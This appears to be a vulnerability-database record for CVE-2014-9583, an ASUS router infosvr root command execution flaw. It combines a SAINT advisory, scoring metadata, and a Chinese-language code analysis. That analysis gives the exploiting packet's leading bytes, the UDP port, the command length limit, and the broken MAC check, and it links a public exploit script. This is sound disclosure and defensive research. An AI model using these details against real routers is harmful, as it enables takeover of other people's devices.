ASUS Router infosvr Service Remote Command Execution Vulnerability

2015-01-13T00:00:00

Description

Added: 01/13/2015 CVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) BID: [71889](<http://www.securityfocus.com/bid/71889>) OSVDB: [116691](<http://www.osvdb.org/116691>) ### Background ASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the "ASUS Wireless Router Device Discovery Utility". The infosvr service listens on port 9999/UDP. ### Problem The file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. ### Resolution Update the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's "Check for Update" functionality may not work properly. ### References <http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> <http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> <https://github.com/jduck/asus-cmd> ### Limitations The exploit attempt must be launched from the same local network as the target. Exploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071.

{"id": "SAINT:46C18EA8DC44A814054B124849F1C9B9", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "published": "2015-01-13T00:00:00", "modified": "2015-01-13T00:00:00", "epss": [{"cve": "CVE-2014-9583", "epss": 0.96389, "percentile": 0.99435, "modified": "2023-11-20"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2014-9583"], "immutableFields": [], "lastseen": "2023-11-20T20:53:38", "viewCount": 102, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-0934"]}, {"type": "cve", "idList": ["CVE-2014-9583"]}, {"type": "exploitdb", "idList": ["EDB-ID:43881"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71928799B4AFACF08ED27F548C324480"]}, {"type": "nessus", "idList": ["ASUSWRT_INFOSVR_COMMAND_EXEC.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146102", "PACKETSTORM:147284"]}, {"type": "saint", "idList": ["SAINT:4A5BD29FAF80B56E6590F3C648A7268F", "SAINT:75674DE142EE6A5182F2C3AEAC3FE313", "SAINT:79379382D62E420B234A449DAE36D8AE"]}, {"type": "seebug", "idList": ["SSV:89236"]}, {"type": "threatpost", "idList": ["THREATPOST:318D2AC145FDD81AA284239AD4ADB10D"]}, {"type": "zdt", "idList": ["1337DAY-ID-30222"]}]}, "score": {"value": 1.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-0934"]}, {"type": "cve", "idList": ["CVE-2014-9583"]}, {"type": "exploitdb", "idList": ["EDB-ID:43881"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71928799B4AFACF08ED27F548C324480"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146102"]}, {"type": "saint", "idList": ["SAINT:79379382D62E420B234A449DAE36D8AE"]}, {"type": "threatpost", "idList": ["THREATPOST:318D2AC145FDD81AA284239AD4ADB10D"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2014-9583", "epss": "0.965460000", "percentile": "0.992940000", "modified": "2023-03-14"}], "vulnersScore": 1.4}, "_state": {"dependencies": 1700514161, "score": 1700513627, "epss": 0}, "_internal": {"score_hash": "21e57b38c8be296345a6007aa3393063"}}

{"checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:45", "description": "A remote command execution vulnerability exists in Asuswrt. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "checkpoint_advisories", "title": "ASUSWRT LAN Backdoor Remote Command Execution (CVE-2014-9583)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2017-09-19T00:00:00", "id": "CPAI-2016-0934", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2023-12-01T20:56:49", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:75674DE142EE6A5182F2C3AEAC3FE313", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:4A5BD29FAF80B56E6590F3C648A7268F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:19", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:79379382D62E420B234A449DAE36D8AE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:32:47", "description": "\u6f0f\u6d1e\u6982\u89812014\u5e7410\u67083\u65e5\uff0c\u56fd\u5916\u5b89\u5168\u7814\u7a76\u5458Joshua J. Drake\u5728\u4ed6github\uff08<a href=\"https://github.com/jduck\">https://github.com/jduck</a>\uff09\u63d0\u4ea4\u4e86\u9488\u5bf9\u534e\u7855\u8def\u7531\u5668\u7684\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1epoc\uff08<a href=\"https://github.com/jduck/asus-cmd\">https://github.com/jduck/asus-cmd</a>\uff09\u3002\u8be5\u6f0f\u6d1e\u968f\u540e\u88ab\u7f16\u53f7\u4e3aCVE-2014-9583\u3002\u77e5\u9053\u521b\u5b87\u5b89\u5168\u7814\u7a76\u56e2\u961f\u5728\u7b2c\u4e00\u65f6\u95f4\u5bf9\u8be5\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u8fdb\u884c\u4e86\u7814\u7a76\u548c\u5206\u6790\u3002<h4>a)     \u6f0f\u6d1e\u63cf\u8ff0</h4>\u534e\u7855\u8def\u7531\u5668R\u7cfb\u5217\u8def\u7531\u5668\u4f7f\u7528\u5f00\u6e90\u8def\u7531\u5668\u7cfb\u7edf <a href=\"https://github.com/RMerl/asuswrt-merlin\" target=\"_blank\">Asuswrt</a>\uff0c\u5f00\u6e90\u4ee3\u7801\u7ed9\u6211\u4eec\u968f\u540e\u7684\u6f0f\u6d1e\u5206\u6790\u5e26\u6765\u5f88\u591a\u65b9\u4fbf\uff0c\u4e0d\u7528\u9006\u5411\u5206\u6790\u3002\u5728Asuswrt\u4e2d\u5b58\u5728 <a href=\"https://github.com/RMerl/asuswrt-merlin/tree/master/release/src/router/infosvr\" target=\"_blank\">infosvr</a> \u8fdb\u7a0b\uff0c\u8be5\u8fdb\u7a0b\u76d1\u542c\u57280.0.0.0 IP\u4e0a\uff0c\u76d1\u542c\u672c\u673a\u4efb\u4f55IP\u76849999 UDP\u7aef\u53e3\u3002Infosvr\u81ea\u8eab\u7684\u6388\u6743\u673a\u5236\u4e0d\u5b8c\u6574\uff0c\u5728infosvr\u5904\u7406\u7528\u6237\u63d0\u4ea4\u7684\u6570\u636e\u65f6\u4e5f\u6ca1\u6709\u9002\u5408\u7684\u8fc7\u6ee4\uff0c\u800c\u4e14\u4f7f\u7528\u4e86system()\u51fd\u6570\u6267\u884c\u90e8\u5206\u8bf7\u6c42\uff0c\u6700\u7ec8\u5bfc\u81f4\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002<h4>b)     \u6f0f\u6d1e\u5f71\u54cd</h4>\u636eJoshua J. Drake\u5728github\u4e0a\u7684\u5206\u6790\uff0c\u53d7\u5f71\u54cd\u7684\u7248\u672c\u5982\u4e0b\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.jpg\" alt=\"1\" width=\"492\" height=\"241\">\u4e0d\u8fc7\uff0c\u5f00\u6e90\u8def\u7531\u5668\u7cfb\u7edfAsuswrt\u9879\u76ee\u652f\u6301\u5982\u4e0b\u6240\u6709\u8def\u7531\u5668\u786c\u4ef6\u578b\u53f7\uff0c\u6240\u4ee5\u5efa\u8bae\u5982\u4e0b\u578b\u53f7\u8def\u7531\u5668\u7528\u6237\u68c0\u6d4b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff1a<ul><li>RT-N16</li><li>RT-AC56U</li><li>RT-N66U</li><li>RT-AC66U</li><li>RT-AC68U</li><li>RT-AC68P</li><li>RT-AC87U</li></ul><h4> c)     \u6f0f\u6d1e\u5206\u6790</h4>\u4ee3\u7801\u6587\u4ef6\uff1a<a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/infosvr.c\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/infosvr.c</a> \u5728\u4ee3\u7801162\u884c\u5904\uff0cinfosvr\u7ed1\u5b9a\u5230\u4e860.0.0.0 IP\u76849999 UDP\u7aef\u53e3\u4e0a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image003.png\" alt=\"image003\" width=\"638\" height=\"179\"> \u5728\u4ee3\u7801186\u884c\u5904\uff0cinfosvr\u5bf9\u4f20\u5165\u7684\u8bf7\u6c42\u4ea4\u7ed9processReq()\u51fd\u6570\u5904\u7406\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image005.png\" alt=\"image005\" width=\"642\" height=\"243\">processReq()\u51fd\u6570\u7684\u529f\u80fd\u5c31\u662f\u63a5\u6536512\u5b57\u8282\u7684\u8bf7\u6c42\u6570\u636e\uff0c\u5e76\u5728\u4ee3\u7801227\u884c\u5904\u628a\u6570\u636e\u4ea4\u7ed9processPacket()\u51fd\u6570\u5904\u7406\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image007.png\" alt=\"image007\" width=\"643\" height=\"454\"> processPacket()\u51fd\u6570\u4f4d\u4e8e\u6587\u4ef6\uff1a<a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/common.c\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/common.c</a> processPacket()\u51fd\u6570\u5728\u4ee3\u7801202\u884c\u5904\u628a512\u5b57\u8282\u7684\u8bf7\u6c42\u6570\u636e(pdubuf\u5b57\u7b26\u6307\u9488)\u8f6c\u6362\u6210IBOX_COMM_PKT_HDR\u7ed3\u6784\uff08phdr\uff09\uff0c\u653b\u51fb\u8005\u5982\u679c\u60f3\u89e6\u53d1\u6f0f\u6d1e\uff0c\u9700\u8981\u6309\u7167\u8fd9\u4e2a\u6570\u636e\u7ed3\u6784\u6765\u53d1\u9001\u6570\u636e\u5305\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image009.png\" alt=\"image009\" width=\"647\" height=\"343\">IBOX_COMM_PKT_HDR\u7ed3\u6784\u5728\u6587\u4ef6\uff1a<a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/iboxcom.h.wirelesshd\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/iboxcom.h.wirelesshd</a> IBOX_COMM_PKT_HDR\u7ed3\u6784\u5728\u4ee3\u780181\u884c\u5904\u5b9a\u4e49\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image011.png\" alt=\"image011\" width=\"641\" height=\"110\">\u60f3\u8981\u8fdb\u5165\u89e6\u53d1\u6f0f\u6d1e\u7684\u5173\u952e\u4ee3\u7801\u533a\u57df\uff0c\u9700\u8981\u901a\u8fc7common.c\u6587\u4ef6\u4ee3\u7801207\u884c\u5904\u7684if\u5224\u65ad\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image013.png\" alt=\"image013\" width=\"645\" height=\"104\">\u6240\u4ee5\uff0c\u6211\u4eec\u8981\u8bbe\u5b9a\u653b\u51fb\u4ee3\u7801\u7684\u524d\u4e24\u5b57\u8282\u5206\u522b\u4e3a\u5e38\u91cfNET_SERVICE_ID_IBOX_INFO\u548cNET_PACKET_TYPE_CMD\u7684\u503c\uff0c\u5373\uff1a\\x0C\\x15\uff08\u5341\u8fdb\u5236\u662f12\u548c21\uff09\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image015.png\" alt=\"image015\" width=\"645\" height=\"140\">\u6765\u5230common.c\u6587\u4ef6\u4ee3\u7801222\u884c\u5904\uff0cinfosvr\u4f5c\u8005\u5e94\u8be5\u662f\u60f3\u5bf9\u968f\u540e\u80fd\u6267\u884csystem()\u51fd\u6570\u4ee3\u7801\u7684\u6570\u636e\u505a\u4e2a\u6388\u6743\uff0c\u6216\u8005\u9a8c\u8bc1\u3002\u8be5\u5904\u4f5c\u8005\u4f7f\u7528\u4e86MAC\u9a8c\u8bc1\uff08\u4ee3\u7801227\u884c\u5904\uff09\u548c\u5bc6\u7801\u9a8c\u8bc1\uff0c\u4e0d\u8fc7\u4e0d\u77e5\u4e3a\u4f55\u5bc6\u7801\u9a8c\u8bc1\u4ee3\u7801\u88ab\u6ce8\u91ca\u6389\u4e86\uff08\u4ee3\u7801240\u884c\u5904\uff09\uff0c\u800c\u9488\u5bf9MAC\u9a8c\u8bc1\u7684\u4ee3\u7801\u4e5f\u5c5e\u4e8e\u6446\u8bbe\u72b6\u6001\uff0c\u4ee3\u7801\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image017.png\" alt=\"image017\" width=\"644\" height=\"355\">\u5728\u9a8c\u8bc1\u524d\uff0c\u9700\u8981\u628a512\u5b57\u8282\u6570\u636epdubuf\u8f6c\u6362\u6210IBOX_COMM_PKT_HDR_EX\u6570\u636e\u7ed3\u6784\uff0cIBOX_COMM_PKT_HDR_EX\u7ed3\u6784\u5305\u542b\u4e86MAC\u5b57\u6bb5\u548c\u5bc6\u7801\u5b57\u6bb5\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image019.png\" alt=\"image019\" width=\"644\" height=\"117\">\u4e3a\u4ec0\u4e48\u8bf4MAC\u9a8c\u8bc1\u662f\u6446\u8bbe\u5462\uff1f\u56e0\u4e3a\u5728common.c\u6587\u4ef6\u4ee3\u7801227\u884c\u5904\uff0c\u4ee3\u7801\u53ea\u662f\u628aMacAddress\u7684\u524d6\u5b57\u8282\u62f7\u8d1d\u5230\u4e86\u5b57\u7b26\u6570\u7ec4mac\u5904\uff0c\u8fd4\u56de\u662f\u6307\u5411mac\u5730\u5740\u7684\u6307\u9488\uff0c\u4e0d\u4f1a\u7b49\u4e8e0\uff0c\u6240\u4ee5\u8be5\u9a8c\u8bc1\u6beb\u65e0\u4efb\u4f55\u7528\u5904\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image021.png\" alt=\"image021\" width=\"642\" height=\"155\">\u5927\u80c6\u731c\u6d4b\u4f5c\u8005\u53ef\u80fd\u662f\u60f3\u7528memcmp()\u51fd\u6570\uff0c\u7ed3\u679c\u7528\u9519\u4e86\uff0c\u4e0d\u5f97\u800c\u77e5\u3002\u7ee7\u7eed\u524d\u8fdb\uff0c\u5728common.c\u6587\u4ef6\u4ee3\u7801251\u884c\u5904\u8fdb\u5165switch()\u51fd\u6570\u5224\u65ad\u9636\u6bb5\uff0c\u9488\u5bf9\u4e0d\u540cOpCode\u6267\u884c\u4e0d\u540c\u7684\u5206\u652f\u4ee3\u7801\uff0c\u800c\u5f53OpCode\u4e3aNET_CMD_ID_MANU_CMD\u5e38\u91cf\u503c\uff08\u5341\u8fdb\u523651\uff0c\u5341\u516d\u8fdb\u523633\uff09\u65f6\uff0c\u624d\u80fd\u6267\u884csystem()\u51fd\u6570\u4ee3\u7801\uff0c\u6240\u4ee5\uff0c\u6211\u4eec\u8981\u8bbe\u5b9a\u653b\u51fb\u4ee3\u7801\u7684\u524d\u56db\u5b57\u8282\u4e3a\\x0C\\x15\\x33\\x00\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image023.png\" alt=\"image023\" width=\"643\" height=\"93\"><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image025.png\" alt=\"image025\" width=\"643\" height=\"243\">\u5728common.c\u6587\u4ef6NET_CMD_ID_MANU_CMD\u5206\u503c\u4ee3\u7801\u4e2d\uff0c\u4ee3\u7801440\u884c\u51fa\u4ee3\u7801\u628apdubuf\u51cf\u53bbIBOX_COMM_PKT_HDR_EX\u7ed3\u6784\u7684\u6570\u636e\uff0c\u5269\u4f59\u90e8\u5206\u8f6c\u6362\u6210PKT_SYSCMD\u7ed3\u6784\uff0c\u4f5c\u4e3a\u547d\u4ee4\u6267\u884c\u6570\u636e\uff0cPKT_SYSCMD\u7ed3\u6784\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image027.png\" alt=\"image027\" width=\"644\" height=\"64\">\u6700\u7ec8\uff0c\u5728common.c\u6587\u4ef6\u4ee3\u7801514\u884c\u5904\uff0csyscmd\u7ed3\u6784\u4e2dcmd\u5b57\u6bb5\u88ab\u8d4b\u503c\u7ed9cmdstr\uff0c\u5728\u4ee3\u7801515\u884c\u5904\uff0ccmdstr\u4f5c\u4e3a\u547d\u4ee4\u88absystem()\u51fd\u6570\u6267\u884c\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image029.png\" alt=\"image029\" width=\"643\" height=\"93\"><h4>d)     \u6f0f\u6d1e\u91cd\u73b0</h4>\u6f0f\u6d1e\u6d4b\u8bd5\u811a\u672c\uff1a<a href=\"http://www.exploit-db.com/exploits/35688/\"> http://www.exploit-db.com/exploits/35688/ </a> \u4e0b\u8f7d\u5b58\u5728\u6f0f\u6d1e\u7684\u534e\u7855\u8def\u7531\u56fa\u4ef6\uff1a<a href=\"http://dlsvr04.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043763626.zip\">http://dlsvr04.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043763626.zip</a> binwalk\u89e3\u538b\u6587\u4ef6\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/31.png\" alt=\"31\" width=\"659\" height=\"258\"><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image033.png\" alt=\"image033\" width=\"652\" height=\"106\"> \u6a21\u62df\u8fd0\u884c\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image035.png\" alt=\"image035\" width=\"610\" height=\"395\">\u653b\u51fbinfosvr\u7a0b\u5e8f\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image037.png\" alt=\"image037\" width=\"608\" height=\"393\">\u547d\u4ee4\u6267\u884c\u6210\u529f\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image039.png\" alt=\"image039\" width=\"626\" height=\"465\"><h4>e)     \u6f0f\u6d1e\u4fee\u590d</h4>\u5f00\u6e90\u8def\u7531\u5668\u7cfb\u7edfAsuswrt\u5df2\u7ecf2015\u5e741\u670810\u53f7\u4e0b\u5348\u4fee\u590d\u4e86\u6f0f\u6d1e\uff0c\u4fee\u590d\u6f0f\u6d1e\u7684\u529e\u6cd5\u662f\u76f4\u63a5\u6ce8\u91ca\u6389\u4e86\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u7684\u5173\u952e\u90e8\u5206\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image041.png\" alt=\"image041\" width=\"644\" height=\"269\">\u534e\u7855\u5b98\u65b9\u4e5f\u63a8\u51fa\u76f8\u5e94\u7684\u56fa\u4ef6\u5347\u7ea7\uff0c\u60f3\u8981\u4fee\u590d\u6f0f\u6d1e\u7684\u7528\u6237\u53ef\u4ee5\u53bb\u4e0b\u8f7d\u76f8\u5173\u8def\u7531\u5668\u578b\u53f7\u7684\u5347\u7ea7\u56fa\u4ef6\uff1a<a href=\"http://www.asus.com.cn/Networking/Wireless_Routers_Products/\">http://www.asus.com.cn/Networking/Wireless_Routers_Products/</a> \u4f8b\u5982RT-AC66U\u578b\u53f7\u8def\u7531\u56682015\u5e741\u670812\u53f7\u63a8\u51fa\u7684\u5347\u7ea7\u7248\u672c\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image043.png\" alt=\"image043\" width=\"611\" height=\"266\"> ZoomEye\u68c0\u6d4b\u62a5\u544a\u7531\u4e8e\u6b64\u6b21\u534e\u7855\u8def\u7531\u5668\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u96be\u4ee5\u4f7f\u7528\u65e0\u635f\u63a2\u6d4b\u65b9\u6cd5\u63a2\u6d4b\uff0c\u6211\u4eec\u4ec5\u6839\u636e\u7248\u672c\u578b\u53f7\u53bb\u63a8\u6d4b\u6f0f\u6d1e\u7684\u5f71\u54cd\u8303\u56f4\u3002\u628a\u53d7\u5f71\u54cd\u7684\u534e\u7855\u8def\u7531\u5668\u578b\u53f7\u653e\u5728ZoomEye\uff08<a href=\"http://www.zoomeye.org\" rel=\"nofollow\">http://www.zoomeye.org</a>\uff09\u4e2d\u68c0\u7d22\uff0c\u6211\u4eec\u5f97\u5230\u4ee5\u4e0b\u6570\u636e\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/10.jpg\" alt=\"10\" width=\"488\" height=\"186\">RT-AC66U\uff0c21776\u4e2a\uff0c\u5982\u56fe\uff1a<img 